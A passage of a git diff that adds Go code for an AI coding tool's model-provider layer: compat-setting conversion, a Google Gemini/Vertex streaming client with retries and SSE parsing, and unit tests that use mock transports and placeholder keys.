+			MaxTokens:     m.MaxTokens,
+			Temperature:   m.Temperature,
+			TopP:          m.TopP,
+			Compat:        convertCompat(m.Compat),
+		})
+	}
+	return result
+}
+
+func convertCompat(c *config.ModelCompat) *provider.ModelCompat {
+	if c == nil {
+		return nil
+	}
+	return &provider.ModelCompat{
+		ThinkingFormat:                      c.ThinkingFormat,
+		RequiresReasoningContentOnAssistant: c.RequiresReasoningContentOnAssistant || c.RequiresReasoningContentOnAssistantMessages,
+		ForceAdaptiveThinking:               c.ForceAdaptiveThinking,
+		SupportsDeveloperRole:               cloneBoolPtr(c.SupportsDeveloperRole),
+		SupportsStore:                       cloneBoolPtr(c.SupportsStore),
+		SupportsReasoningEffort:             cloneBoolPtr(c.SupportsReasoningEffort),
+		SupportsStrictMode:                  cloneBoolPtr(c.SupportsStrictMode),
+		MaxTokensField:                      c.MaxTokensField,
+		SupportsCacheControlOnTools:         cloneBoolPtr(c.SupportsCacheControlOnTools),
+		SupportsLongCacheRetention:          cloneBoolPtr(c.SupportsLongCacheRetention),
+		SupportsPromptCacheKey:              cloneBoolPtr(c.SupportsPromptCacheKey),
+		SupportsReasoningSummary:            cloneBoolPtr(c.SupportsReasoningSummary),
+		SendSessionAffinityHeaders:          c.SendSessionAffinityHeaders,
+		SupportsEagerToolInputStreaming:     cloneBoolPtr(c.SupportsEagerToolInputStreaming),
+	}
+}
+
+func cloneBoolPtr(v *bool) *bool {
+	if v == nil {
+		return nil
+	}
+	copied := *v
+	return &copied
+}
diff --git a/internal/provider/factory/factory_test.go b/internal/provider/factory/factory_test.go
new file mode 100644
index 0000000..014e4a8
--- /dev/null
+++ b/internal/provider/factory/factory_test.go
@@ -0,0 +1,186 @@
+package factory
+
+import (
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+)
+
+func TestCreateAppliesExplicitVendorDefaults(t *testing.T) {
+	settings := config.DefaultSettings()
+	settings.Providers = map[string]*config.ProviderConfig{
+		"custom-deepseek": {
+			Vendor:  "deepseek",
+			BaseURL: "https://example.com/v1",
+			APIKey:  "fake-key",
+			API:     "openai-chat",
+			Models: []config.ModelConfig{
+				{ID: "m1", Name: "M1", Reasoning: true},
+			},
+		},
+	}
+	settings.DefaultProvider = "custom-deepseek"
+	settings.DefaultModel = "m1"
+
+	p, model, err := Create(settings, "", "")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p.Name() != "openai" {
+		t.Fatalf("provider name = %q, want openai", p.Name())
+	}
+	if model == nil || model.ID != "m1" {
+		t.Fatalf("model = %#v, want m1", model)
+	}
+}
+
+func TestConvertModelConfigsPreservesCompat(t *testing.T) {
+	supportsReasoningEffort := false
+	models := ConvertModelConfigs("test", []config.ModelConfig{
+		{
+			ID:        "m1",
+			Name:      "M1",
+			Reasoning: true,
+			Compat: &config.ModelCompat{
+				ThinkingFormat:          "deepseek",
+				SupportsReasoningEffort: &supportsReasoningEffort,
+				MaxTokensField:          "max_completion_tokens",
+			},
+		},
+	})
+	if len(models) != 1 {
+		t.Fatalf("len(models) = %d, want 1", len(models))
+	}
+	compat := models[0].Compat
+	if compat == nil {
+		t.Fatal("compat = nil")
+	}
+	if compat.ThinkingFormat != "deepseek" {
+		t.Fatalf("ThinkingFormat = %q, want deepseek", compat.ThinkingFormat)
+	}
+	if compat.SupportsReasoningEffort == nil || *compat.SupportsReasoningEffort {
+		t.Fatalf("SupportsReasoningEffort = %#v, want false", compat.SupportsReasoningEffort)
+	}
+	if compat.MaxTokensField != "max_completion_tokens" {
+		t.Fatalf("MaxTokensField = %q, want max_completion_tokens", compat.MaxTokensField)
+	}
+}
+
+func TestCreateOpenAIResponsesProvider(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"openai-responses-test": {
+				APIKey:  "fake-key",
+				BaseURL: "https://api.openai.com/v1",
+				API:     "openai-responses",
+				Responses: config.ResponsesConfig{
+					ReasoningSummary:     "concise",
+					PromptCacheKey:       "custom-cache-key",
+					PromptCacheRetention: "24h",
+				},
+				Models: []config.ModelConfig{
+					{ID: "gpt-test", Name: "GPT Test"},
+				},
+			},
+		},
+	}
+
+	p, model, err := Create(settings, "openai-responses-test", "gpt-test")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p == nil {
+		t.Fatal("provider is nil")
+	}
+	if model == nil || model.ID != "gpt-test" {
+		t.Fatalf("model = %#v, want gpt-test", model)
+	}
+}
+
+func TestCreateGoogleGeminiProvider(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"gemini-test": {
+				APIKey:  "fake-key",
+				BaseURL: "https://generativelanguage.googleapis.com/v1beta/models",
+				API:     "google-gemini",
+				Models: []config.ModelConfig{
+					{ID: "gemini-test", Name: "Gemini Test", Reasoning: true},
+				},
+			},
+		},
+	}
+
+	p, model, err := Create(settings, "gemini-test", "gemini-test")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p.Name() != "google-gemini" {
+		t.Fatalf("provider name = %q, want google-gemini", p.Name())
+	}
+	if model == nil || model.ID != "gemini-test" {
+		t.Fatalf("model = %#v, want gemini-test", model)
+	}
+}
+
+func TestCreateGoogleVertexProvider(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"vertex-test": {
+				APIKey:  "fake-token",
+				BaseURL: "https://aiplatform.googleapis.com/v1/projects/test/locations/global/publishers/google/models",
+				API:     "google-vertex",
+				Models: []config.ModelConfig{
+					{ID: "gemini-test", Name: "Gemini Test", Reasoning: true},
+				},
+			},
+		},
+	}
+
+	p, model, err := Create(settings, "vertex-test", "gemini-test")
+	if err != nil {
+		t.Fatalf("create provider: %v", err)
+	}
+	if p.Name() != "google-vertex" {
+		t.Fatalf("provider name = %q, want google-vertex", p.Name())
+	}
+	if model == nil || model.ID != "gemini-test" {
+		t.Fatalf("model = %#v, want gemini-test", model)
+	}
+}
+
+func TestCreateProviderRejectsInvalidHTTPProxy(t *testing.T) {
+	settings := &config.Settings{
+		Providers: map[string]*config.ProviderConfig{
+			"bad-proxy": {
+				APIKey:    "fake-key",
+				BaseURL:   "https://api.openai.com/v1",
+				API:       "openai-chat",
+				HTTPProxy: "http://[::1",
+				Models: []config.ModelConfig{
+					{ID: "gpt-test", Name: "GPT Test"},
+				},
+			},
+		},
+	}
+
+	if _, _, err := Create(settings, "bad-proxy", "gpt-test"); err == nil {
+		t.Fatal("expected invalid http proxy error")
+	}
+}
+
+func TestConvertModelConfigsSupportsReferenceReasoningAlias(t *testing.T) {
+	models := ConvertModelConfigs("test", []config.ModelConfig{
+		{
+			ID:   "m1",
+			Name: "M1",
+			Compat: &config.ModelCompat{
+				RequiresReasoningContentOnAssistantMessages: true,
+			},
+		},
+	})
+	compat := models[0].Compat
+	if compat == nil || !compat.RequiresReasoningContentOnAssistant {
+		t.Fatalf("RequiresReasoningContentOnAssistant = %#v, want true", compat)
+	}
+}
diff --git a/internal/provider/google/provider.go b/internal/provider/google/provider.go
new file mode 100644
index 0000000..af0e4f0
--- /dev/null
+++ b/internal/provider/google/provider.go
@@ -0,0 +1,533 @@
+package google
+
+import (
+	"bufio"
+	"bytes"
+	"context"
+	"encoding/json"
+	"fmt"
+	"io"
+	"net/http"
+	"os"
+	"strings"
+	"time"
+
+	"github.com/startvibecoding/vibecoding/internal/provider"
+	"github.com/startvibecoding/vibecoding/internal/ua"
+)
+
+type APIKind string
+
+const (
+	APIKindGemini APIKind = "gemini"
+	APIKindVertex APIKind = "vertex"
+)
+
+type Provider struct {
+	provider.BaseProvider
+	apiKey        string
+	baseURL       string
+	apiKind       APIKind
+	client        *http.Client
+	retryConfig   *provider.RetryConfig
+	cachedContent string
+}
+
+func DefaultModels(providerName string) []*provider.Model {
+	return []*provider.Model{
+		{
+			ID: "gemini-2.5-pro", Name: "Gemini 2.5 Pro", Provider: providerName, Reasoning: true,
+			Input: []string{"text", "image"}, ContextWindow: 1000000, MaxTokens: 65536,
+		},
+		{
+			ID: "gemini-2.5-flash", Name: "Gemini 2.5 Flash", Provider: providerName, Reasoning: true,
+			Input: []string{"text", "image"}, ContextWindow: 1000000, MaxTokens: 65536,
+		},
+	}
+}
+
+func NewGeminiProvider(apiKey, baseURL string) *Provider {
+	return NewGeminiProviderWithModels(apiKey, baseURL, DefaultModels("google-gemini"))
+}
+
+func NewGeminiProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewGeminiProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient("google-gemini", APIKindGemini, apiKey, baseURL, "https://generativelanguage.googleapis.com/v1beta/models", models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewGeminiProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	return newProvider("google-gemini", APIKindGemini, apiKey, baseURL, "https://generativelanguage.googleapis.com/v1beta/models", proxyURL, models)
+}
+
+func NewVertexProvider(apiKey, baseURL string) *Provider {
+	return NewVertexProviderWithModels(apiKey, baseURL, DefaultModels("google-vertex"))
+}
+
+func NewVertexProviderWithModels(apiKey, baseURL string, models []*provider.Model) *Provider {
+	p, err := NewVertexProviderWithModelsAndProxy(apiKey, baseURL, "", models)
+	if err != nil {
+		return newProviderWithHTTPClient("google-vertex", APIKindVertex, apiKey, baseURL, "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models", models, &http.Client{Timeout: 30 * time.Minute})
+	}
+	return p
+}
+
+func NewVertexProviderWithModelsAndProxy(apiKey, baseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	return newProvider("google-vertex", APIKindVertex, apiKey, baseURL, "https://aiplatform.googleapis.com/v1/projects/YOUR_PROJECT/locations/global/publishers/google/models", proxyURL, models)
+}
+
+func newProvider(name string, kind APIKind, apiKey, baseURL, defaultBaseURL, proxyURL string, models []*provider.Model) (*Provider, error) {
+	client, err := provider.NewHTTPClient(30*time.Minute, proxyURL)
+	if err != nil {
+		return nil, fmt.Errorf("configure http proxy: %w", err)
+	}
+	return newProviderWithHTTPClient(name, kind, apiKey, baseURL, defaultBaseURL, models, client), nil
+}
+
+func newProviderWithHTTPClient(name string, kind APIKind, apiKey, baseURL, defaultBaseURL string, models []*provider.Model, client *http.Client) *Provider {
+	if baseURL == "" {
+		baseURL = defaultBaseURL
+	}
+	if apiKey == "" {
+		switch kind {
+		case APIKindGemini:
+			apiKey = os.Getenv("GOOGLE_API_KEY")
+		case APIKindVertex:
+			apiKey = os.Getenv("GOOGLE_VERTEX_ACCESS_TOKEN")
+		}
+	}
+	return &Provider{
+		BaseProvider: provider.NewBaseProvider(name, models),
+		apiKey:       apiKey,
+		baseURL:      strings.TrimRight(baseURL, "/"),
+		apiKind:      kind,
+		client:       client,
+	}
+}
+
+func (p *Provider) SetRetryConfig(cfg *provider.RetryConfig) {
+	p.retryConfig = cfg
+}
+
+// SetCachedContent sets an explicit Google cached content resource to reuse.
+// The value should be a full cached content resource name, for example
+// "cachedContents/abc123". Empty disables explicit cached content reuse.
+func (p *Provider) SetCachedContent(name string) {
+	p.cachedContent = strings.TrimSpace(name)
+}
+
+type googleRequest struct {
+	SystemInstruction *googleContent        `json:"systemInstruction,omitempty"`
+	Contents          []googleContent       `json:"contents"`
+	Tools             []googleTool          `json:"tools,omitempty"`
+	GenerationConfig  *googleGenerationConf `json:"generationConfig,omitempty"`
+	CachedContent     string                `json:"cachedContent,omitempty"`
+}
+
+type googleGenerationConf struct {
+	MaxOutputTokens int                   `json:"maxOutputTokens,omitempty"`
+	Temperature     *float64              `json:"temperature,omitempty"`
+	TopP            *float64              `json:"topP,omitempty"`
+	ThinkingConfig  *googleThinkingConfig `json:"thinkingConfig,omitempty"`
+}
+
+type googleThinkingConfig struct {
+	ThinkingBudget  int  `json:"thinkingBudget,omitempty"`
+	IncludeThoughts bool `json:"includeThoughts,omitempty"`
+}
+
+type googleContent struct {
+	Role  string       `json:"role,omitempty"`
+	Parts []googlePart `json:"parts"`
+}
+
+type googlePart struct {
+	Text             string                  `json:"text,omitempty"`
+	Thought          bool                    `json:"thought,omitempty"`
+	ThoughtSignature string                  `json:"thoughtSignature,omitempty"`
+	InlineData       *googleInlineData       `json:"inlineData,omitempty"`
+	FunctionCall     *googleFunctionCall     `json:"functionCall,omitempty"`
+	FunctionResponse *googleFunctionResponse `json:"functionResponse,omitempty"`
+}
+
+type googleInlineData struct {
+	MimeType string `json:"mimeType"`
+	Data     string `json:"data"`
+}
+
+type googleFunctionCall struct {
+	Name string          `json:"name"`
+	Args json.RawMessage `json:"args,omitempty"`
+}
+
+type googleFunctionResponse struct {
+	Name     string         `json:"name"`
+	Response map[string]any `json:"response"`
+}
+
+type googleTool struct {
+	FunctionDeclarations []googleFunctionDeclaration `json:"functionDeclarations,omitempty"`
+}
+
+type googleFunctionDeclaration struct {
+	Name        string          `json:"name"`
+	Description string          `json:"description,omitempty"`
+	Parameters  json.RawMessage `json:"parameters,omitempty"`
+}
+
+type googleResponse struct {
+	Candidates    []googleCandidate    `json:"candidates,omitempty"`
+	UsageMetadata *googleUsageMetadata `json:"usageMetadata,omitempty"`
+	Error         *googleResponseError `json:"error,omitempty"`
+}
+
+type googleCandidate struct {
+	Content      googleContent `json:"content"`
+	FinishReason string        `json:"finishReason,omitempty"`
+}
+
+type googleUsageMetadata struct {
+	PromptTokenCount        int `json:"promptTokenCount,omitempty"`
+	CandidatesTokenCount    int `json:"candidatesTokenCount,omitempty"`
+	TotalTokenCount         int `json:"totalTokenCount,omitempty"`
+	ThoughtsTokenCount      int `json:"thoughtsTokenCount,omitempty"`
+	CachedContentTokenCount int `json:"cachedContentTokenCount,omitempty"`
+}
+
+type googleResponseError struct {
+	Code    int    `json:"code,omitempty"`
+	Message string `json:"message,omitempty"`
+	Status  string `json:"status,omitempty"`
+}
+
+func (p *Provider) Chat(ctx context.Context, params provider.ChatParams) <-chan provider.StreamEvent {
+	ch := make(chan provider.StreamEvent, 100)
+	go func() {
+		defer close(ch)
+
+		if p.apiKey == "" {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("%s API key/token not set", p.Name())}
+			return
+		}
+
+		modelID := params.ModelID
+		if modelID == "" {
+			if len(p.Models()) > 0 {
+				modelID = p.Models()[0].ID
+			} else {
+				modelID = "gemini-2.5-flash"
+			}
+		}
+
+		reqBody := googleRequest{
+			Contents:         p.convertMessages(params),
+			Tools:            p.convertTools(params.Tools),
+			GenerationConfig: p.generationConfig(params, p.GetModel(modelID)),
+		}
+		if p.cachedContent != "" {
+			reqBody.CachedContent = p.cachedContent
+		}
+		if params.SystemPrompt != "" {
+			reqBody.SystemInstruction = &googleContent{Parts: []googlePart{{Text: params.SystemPrompt}}}
+		}
+
+		body, err := json.Marshal(reqBody)
+		if err != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("marshal request: %w", err)}
+			return
+		}
+		if os.Getenv("VIBECODING_DEBUG") != "" {
+			fmt.Fprintf(os.Stderr, "[DEBUG] Google request body: %s\n", string(body))
+		}
+
+		maxRetries := 0
+		baseDelayMs := 2000
+		if p.retryConfig != nil && p.retryConfig.Enabled {
+			maxRetries = p.retryConfig.MaxRetries
+			baseDelayMs = p.retryConfig.BaseDelayMs
+		}
+
+		endpoint := p.streamEndpoint(modelID)
+		for attempt := 0; attempt <= maxRetries; attempt++ {
+			if err := ctx.Err(); err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: err, StopReason: "aborted"}
+				return
+			}
+
+			req, err := http.NewRequestWithContext(ctx, "POST", endpoint, bytes.NewReader(body))
+			if err != nil {
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("create request: %w", err)}
+				return
+			}
+			p.setHeaders(req)
+
+			resp, err := p.client.Do(req)
+			if err != nil {
+				if attempt < maxRetries && provider.IsRetryable(err, 0) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err))}
+					if !sleepOrAbort(ctx, delay, ch) {
+						return
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("send request: %w", err)}
+				return
+			}
+
+			if resp.StatusCode != http.StatusOK {
+				bodyBytes, _ := io.ReadAll(resp.Body)
+				resp.Body.Close()
+				if attempt < maxRetries && provider.IsRetryable(nil, resp.StatusCode) {
+					delay := provider.RetryDelay(attempt, baseDelayMs)
+					err := fmt.Errorf("HTTP %d: %s", resp.StatusCode, string(bodyBytes))
+					ch <- provider.StreamEvent{Type: provider.StreamRetry, RetryAttempt: attempt + 1, RetryMax: maxRetries, Error: fmt.Errorf("%s", provider.FormatRetryMessage(attempt, maxRetries, delay, err))}
+					if !sleepOrAbort(ctx, delay, ch) {
+						return
+					}
+					continue
+				}
+				ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("API error %d: %s", resp.StatusCode, string(bodyBytes))}
+				return
+			}
+
+			p.parseSSE(ctx, resp.Body, ch, params)
+			resp.Body.Close()
+			return
+		}
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("all %d retry attempts exhausted", maxRetries)}
+	}()
+	return ch
+}
+
+func sleepOrAbort(ctx context.Context, delay time.Duration, ch chan<- provider.StreamEvent) bool {
+	select {
+	case <-ctx.Done():
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+		return false
+	case <-time.After(delay):
+		return true
+	}
+}
+
+func (p *Provider) setHeaders(req *http.Request) {
+	req.Header.Set("Content-Type", "application/json")
+	req.Header.Set("Accept", "text/event-stream")
+	req.Header.Set("User-Agent", ua.ProviderUserAgent())
+	switch p.apiKind {
+	case APIKindVertex:
+		req.Header.Set("Authorization", "Bearer "+p.apiKey)
+	default:
+		req.Header.Set("x-goog-api-key", p.apiKey)
+	}
+}
+
+func (p *Provider) streamEndpoint(modelID string) string {
+	base := strings.TrimRight(p.baseURL, "/")
+	model := strings.TrimPrefix(modelID, "models/")
+	if strings.Contains(model, "/") {
+		model = strings.Trim(model, "/")
+	}
+	return base + "/" + model + ":streamGenerateContent?alt=sse"
+}
+
+func (p *Provider) generationConfig(params provider.ChatParams, model *provider.Model) *googleGenerationConf {
+	maxTokens := params.MaxTokens
+	if maxTokens == 0 {
+		maxTokens = 16384
+	}
+	cfg := &googleGenerationConf{
+		MaxOutputTokens: maxTokens,
+		Temperature:     params.Temperature,
+		TopP:            params.TopP,
+	}
+	if params.ThinkingLevel != provider.ThinkingOff && model != nil && model.Reasoning {
+		cfg.ThinkingConfig = &googleThinkingConfig{ThinkingBudget: googleThinkingBudget(params.ThinkingLevel), IncludeThoughts: true}
+	}
+	return cfg
+}
+
+func googleThinkingBudget(level provider.ThinkingLevel) int {
+	switch level {
+	case provider.ThinkingMinimal:
+		return 128
+	case provider.ThinkingLow:
+		return 1024
+	case provider.ThinkingHigh:
+		return 8192
+	case provider.ThinkingXHigh:
+		return 24576
+	default:
+		return 4096
+	}
+}
+
+func (p *Provider) convertMessages(params provider.ChatParams) []googleContent {
+	var contents []googleContent
+	for _, msg := range params.Messages {
+		content := googleContent{Role: googleRole(msg.Role)}
+		if msg.Role == "toolResult" {
+			response := map[string]any{"content": msg.Content}
+			if msg.IsError {
+				response["error"] = true
+			}
+			content.Parts = append(content.Parts, googlePart{FunctionResponse: &googleFunctionResponse{Name: msg.ToolName, Response: response}})
+			contents = append(contents, content)
+			continue
+		}
+
+		if len(msg.Contents) == 0 {
+			if msg.Content != "" {
+				content.Parts = append(content.Parts, googlePart{Text: msg.Content})
+			}
+			if len(content.Parts) > 0 {
+				contents = append(contents, content)
+			}
+			continue
+		}
+
+		for _, block := range msg.Contents {
+			switch block.Type {
+			case "text":
+				if block.Text != "" {
+					content.Parts = append(content.Parts, googlePart{Text: block.Text})
+				}
+			case "image":
+				if block.Image != nil {
+					content.Parts = append(content.Parts, googlePart{InlineData: &googleInlineData{MimeType: block.Image.MimeType, Data: block.Image.Data}})
+				}
+			case "toolCall":
+				if block.ToolCall != nil {
+					content.Parts = append(content.Parts, googlePart{FunctionCall: &googleFunctionCall{Name: block.ToolCall.Name, Args: block.ToolCall.Arguments}})
+				}
+			}
+		}
+		if len(content.Parts) > 0 {
+			contents = append(contents, content)
+		}
+	}
+	return contents
+}
+
+func googleRole(role string) string {
+	switch role {
+	case "assistant":
+		return "model"
+	case "toolResult":
+		return "user"
+	default:
+		return "user"
+	}
+}
+
+func (p *Provider) convertTools(tools []provider.ToolDefinition) []googleTool {
+	var declarations []googleFunctionDeclaration
+	for _, t := range tools {
+		if t.Kind == "hosted" {
+			continue
+		}
+		declarations = append(declarations, googleFunctionDeclaration{Name: t.Name, Description: t.Description, Parameters: t.Parameters})
+	}
+	if len(declarations) == 0 {
+		return nil
+	}
+	return []googleTool{{FunctionDeclarations: declarations}}
+}
+
+func (p *Provider) parseSSE(ctx context.Context, body io.Reader, ch chan<- provider.StreamEvent, params provider.ChatParams) {
+	scanner := bufio.NewScanner(body)
+	scanner.Buffer(make([]byte, 1024*1024), 1024*1024)
+
+	ch <- provider.StreamEvent{Type: provider.StreamStart}
+	var usage *provider.Usage
+	var stopReason string
+	toolCallIndex := 0
+
+	for scanner.Scan() {
+		select {
+		case <-ctx.Done():
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: ctx.Err(), StopReason: "aborted"}
+			return
+		case <-params.Abort:
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("aborted"), StopReason: "aborted"}
+			return
+		default:
+		}
+
+		line := scanner.Text()
+		if !strings.HasPrefix(line, "data: ") {
+			continue
+		}
+		data := strings.TrimPrefix(line, "data: ")
+		if data == "[DONE]" {
+			break
+		}
+
+		var chunk googleResponse
+		if err := json.Unmarshal([]byte(data), &chunk); err != nil {
+			continue
+		}
+		if chunk.Error != nil {
+			ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("%s: %s", chunk.Error.Status, chunk.Error.Message), StopReason: "error"}
+			return
+		}
+		if chunk.UsageMetadata != nil {
+			usage = convertUsage(chunk.UsageMetadata)
+		}
+
+		for _, candidate := range chunk.Candidates {
+			if candidate.FinishReason != "" {
+				stopReason = strings.ToLower(candidate.FinishReason)
+			}
+			for _, part := range candidate.Content.Parts {
+				if part.Text != "" {
+					if part.Thought {
+						ch <- provider.StreamEvent{Type: provider.StreamThinkDelta, ThinkDelta: part.Text}
+					} else {
+						ch <- provider.StreamEvent{Type: provider.StreamTextDelta, TextDelta: part.Text}
+					}
+				}
+				if part.ThoughtSignature != "" {
+					ch <- provider.StreamEvent{Type: provider.StreamThinkSignature, ThinkSignature: part.ThoughtSignature}
+				}
+				if part.FunctionCall != nil {
+					toolCallIndex++
+					args := part.FunctionCall.Args
+					if len(args) == 0 {
+						args = json.RawMessage(`{}`)
+					}
+					tc := &provider.ToolCallBlock{
+						ID:        fmt.Sprintf("google_toolcall_%d", toolCallIndex),
+						Name:      part.FunctionCall.Name,
+						Arguments: args,
+					}
+					ch <- provider.StreamEvent{Type: provider.StreamToolCall, ToolCall: tc}
+				}
+			}
+		}
+	}
+
+	if err := scanner.Err(); err != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamError, Error: fmt.Errorf("stream read error: %w", err), StopReason: "error"}
+		return
+	}
+	if usage != nil {
+		ch <- provider.StreamEvent{Type: provider.StreamUsage, Usage: usage}
+	}
+	ch <- provider.StreamEvent{Type: provider.StreamDone, StopReason: stopReason}
+}
+
+func convertUsage(u *googleUsageMetadata) *provider.Usage {
+	if u == nil {
+		return nil
+	}
+	return &provider.Usage{
+		Input:       u.PromptTokenCount,
+		Output:      u.CandidatesTokenCount,
+		Reasoning:   u.ThoughtsTokenCount,
+		CacheRead:   u.CachedContentTokenCount,
+		TotalTokens: u.TotalTokenCount,
+	}
+}
diff --git a/internal/provider/google/provider_test.go b/internal/provider/google/provider_test.go
new file mode 100644
index 0000000..53aba7f
--- /dev/null
+++ b/internal/provider/google/provider_test.go
@@ -0,0 +1,246 @@
+package google
+
+import (
+	"bytes"
+	"context"
+	"encoding/json"
+	"io"
+	"net/http"
+	"net/url"
+	"testing"
+
+	"github.com/startvibecoding/vibecoding/internal/config"
+	"github.com/startvibecoding/vibecoding/internal/provider"
+)
+
+type roundTripFunc func(*http.Request) (*http.Response, error)
+
+func (f roundTripFunc) RoundTrip(r *http.Request) (*http.Response, error) {
+	return f(r)
+}
+
+func newMockGoogleProvider(t *testing.T, p *Provider, sse string, bodyCh chan<- string, check func(*http.Request)) *Provider {
+	t.Helper()
+	p.client = &http.Client{Transport: roundTripFunc(func(r *http.Request) (*http.Response, error) {
+		if check != nil {
+			check(r)
+		}
+		if bodyCh != nil {
+			body, err := io.ReadAll(r.Body)
+			if err != nil {
+				return nil, err
+			}
+			bodyCh <- string(body)
+		}
+		return &http.Response{
+			StatusCode: http.StatusOK,
+			Header:     make(http.Header),
+			Body:       io.NopCloser(bytes.NewBufferString(sse)),
+			Request:    r,
+		}, nil
+	})}
+	return p
+}
+
+func TestResolveAPIKeyShellCommandRequiresOptIn(t *testing.T) {
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "")
+	if got := resolveAPIKey(&config.ProviderConfig{APIKey: "!printf secret"}); got != "!printf secret" {
+		t.Fatalf("resolveAPIKey without opt-in = %q, want literal", got)
+	}
+
+	t.Setenv("VIBECODING_ALLOW_SHELL_CONFIG", "1")
+	if got := resolveAPIKey(&config.ProviderConfig{APIKey: "!printf secret"}); got != "secret" {
+		t.Fatalf("resolveAPIKey with opt-in = %q, want secret", got)
+	}
+}
+
+func TestGoogleProviderHTTPProxy(t *testing.T) {
+	p, err := NewGeminiProviderWithModelsAndProxy("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", "http://127.0.0.1:7890", []*provider.Model{{ID: "m1"}})
+	if err != nil {
+		t.Fatalf("provider with proxy: %v", err)
+	}
+	transport, ok := p.client.Transport.(*http.Transport)
+	if !ok {
+		t.Fatalf("transport = %T, want *http.Transport", p.client.Transport)
+	}
+	proxyURL, err := transport.Proxy(&http.Request{URL: &url.URL{Scheme: "https", Host: "generativelanguage.googleapis.com"}})
+	if err != nil {
+		t.Fatalf("proxy lookup: %v", err)
+	}
+	if proxyURL == nil || proxyURL.String() != "http://127.0.0.1:7890" {
+		t.Fatalf("proxy = %v, want http://127.0.0.1:7890", proxyURL)
+	}
+}
+
+func TestGoogleGeminiRequest(t *testing.T) {
+	bodyCh := make(chan string, 1)
+	p := newMockGoogleProvider(t,
+		NewGeminiProviderWithModels("fake-key", "https://generativelanguage.googleapis.com/v1beta/models", []*provider.Model{{ID: "gemini-test", Reasoning: true}}),
+		"data: {\"candidates\":[{\"content\":{\"parts\":[{\"text\":\"ok\"}]},\"finishReason\":\"STOP\"}]}\n",
+		bodyCh,
+		func(r *http.Request) {
+			if r.URL.Path != "/v1beta/models/gemini-test:streamGenerateContent" {
+				t.Fatalf("path = %q, want /v1beta/models/gemini-test:streamGenerateContent", r.URL.Path)
+			}
+			if r.URL.Query().Get("alt") != "sse" {
+				t.Fatalf("alt query = %q, want sse", r.URL.Query().Get("alt"))
+			}
+			if r.Header.Get("x-goog-api-key") != "fake-key" {
+				t.Fatalf("x-goog-api-key = %q, want fake-key", r.Header.Get("x-goog-api-key"))
+			}
+		})
+
+	temp := 0.2
+	params := provider.ChatParams{
+		ModelID:       "gemini-test",
+		SystemPrompt:  "system",
+		Messages:      []provider.Message{provider.NewUserMessage("hi")},
+		Tools:         []provider.ToolDefinition{{Name: "read", Description: "Read file", Parameters: json.RawMessage(`{"type":"object"}`)}},
+		ThinkingLevel: provider.ThinkingHigh,
+		MaxTokens:     123,
+		Temperature:   &temp,
+		Abort:         make(chan struct{}),
+	}
+	for range p.Chat(context.Background(), params) {
+	}
+
+	var req googleRequest
+	select {
+	case body := <-bodyCh:
+		if err := json.Unmarshal([]byte(body), &req); err != nil {
+			t.Fatalf("unmarshal request body: %v\nbody: %s", err, body)
+		}
+	default:
+		t.Fatal("no request body captured")
+	}
+	if req.SystemInstruction == nil || req.SystemInstruction.Parts[0].Text != "system" {
+		t.Fatalf("systemInstruction = %#v, want system text", req.SystemInstruction)
+	}
+	if len(req.Contents) != 1 || req.Contents[0].Role != "user" || req.Contents[0].Parts[0].Text != "hi" {
+		t.Fatalf("contents = %#v, want user hi", req.Contents)
+	}
+	if req.GenerationConfig == nil || req.GenerationConfig.MaxOutputTokens != 123 {
+		t.Fatalf("generationConfig = %#v, want max 123", req.GenerationConfig)
+	}
+	if req.GenerationConfig.Temperature == nil || *req.GenerationConfig.Temperature != temp {
+		t.Fatalf("temperature = %#v, want %v", req.GenerationConfig.Temperature, temp)
+	}
+	if req.GenerationConfig.ThinkingConfig == nil || req.GenerationConfig.ThinkingConfig.ThinkingBudget != 8192 {
+		t.Fatalf("thinkingConfig = %#v, want high budget", req.GenerationConfig.ThinkingConfig)
+	}
+	if !req.GenerationConfig.ThinkingConfig.IncludeThoughts {
+		t.Fatal("thinkingConfig.includeThoughts = false, want true")
+	}
+	if len(req.Tools) != 1 || len(req.Tools[0].FunctionDeclarations) != 1 || req.Tools[0].FunctionDeclarations[0].Name != "read" {
+		t.Fatalf("tools = %#v, want read declaration", req.Tools)
+	}
+}
+
+func TestGoogleRequestCachedContent(t *testing.T) {
+	bodyCh := make(chan string, 1)
